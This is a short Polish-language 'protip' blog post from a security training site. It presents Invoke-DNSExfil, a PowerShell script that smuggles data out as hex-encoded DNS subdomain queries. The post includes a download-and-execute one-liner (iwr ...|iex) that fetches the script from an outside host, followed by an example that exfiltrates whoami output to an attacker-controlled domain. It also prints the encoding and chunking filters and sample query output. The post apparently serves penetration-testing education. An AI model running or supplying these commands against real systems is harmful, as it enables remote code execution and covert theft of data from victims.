alphasec academy

Eksfiltracja po DNS? Proszę bardzo: iwr aptm.in/g/dnsex|iex; whoami|Invoke-DNSExfil foo.aptmc.pl

Dodatkowe informacje

Ten nieskomplikowny skrypt o nazwie Invoke-DNSExfil, pozwla na bardzo prostą eksfiltrację z pomocą zapytań DNS. Wykorzystuje cmdlet Resolve-DnsName, który wysyła odpowiednie zapytanie do domyślnego serwera DNS (np. 8.8.8.8, 1.1.1.1) lub tego, który jest jawnie wskazany poprzez -Server.
Dodatkowo zdefiniowane są dla wygody 3 filtry:
 • filter thx { ($_.ToCharArray() | % { "{0:X2}" -f [int]$_ }) -join "" }
  - zakoduj wejście do HEXów
 • filter chunks($c) { $t = $_; 0..[math]::floor($t.length / $c) | % { $t.substring($c * $_, [math]::min($c, $t.length - $c * $_)) } }
  - podziel wejście na $c elementów (co będzie związane maksymalną długością odpytywanej subdomeny
 • filter dots($c) { ($_ -replace "([\w]{$c})", "`$1.").trim('.') }
  - wstaw kropki co $c znaków, czyli podziel domenę na subdomeny

Przykład

Poniższy przykład powinien wyjaśnić zasadę działania - wynik polecenia whoami po zamienieniu na hexy zostanie wysłany pod przykryciem zapytania o pewne subdomeny. Teraz po stronie serwera DNS obsługującego daną domenę wystarczy zdekodować nazwy subdomen z hexów na ascii i gotowe.
PS C:\Users\Lenovo> iwr aptm.in/g/dnsex -useb|iex; whoami|Invoke-DNSExfil foo.aptmc.pl

Name                      Type  TTL  Section  IPAddress
----                      ----  ---  -------  ---------
___begin___.1.foo.aptmc.pl           A   4502 Answer   217.182.120.233
6465736B746F702D69687575636F705C.6C656E6F766F0 A   4502 Answer   217.182.120.233
D0A.1.foo.aptmc.pl
___end___.1.foo.aptmc.pl            A   4502 Answer   217.182.120.233


PS C:\Users\Lenovo>
I nie zapominajcie, że czasem warto użyć -useb (-UseBasicParsing), o czym było trochę w jednym z poprzednich Protipów.

Przydatne linki


Subskrybuj

Jeśli chcesz otrzymywać nowe, mięsiste protipy na maila, a także zostać czasem powiadomiony o wartościowych wydarzeniach - dołącz do subskrybentów.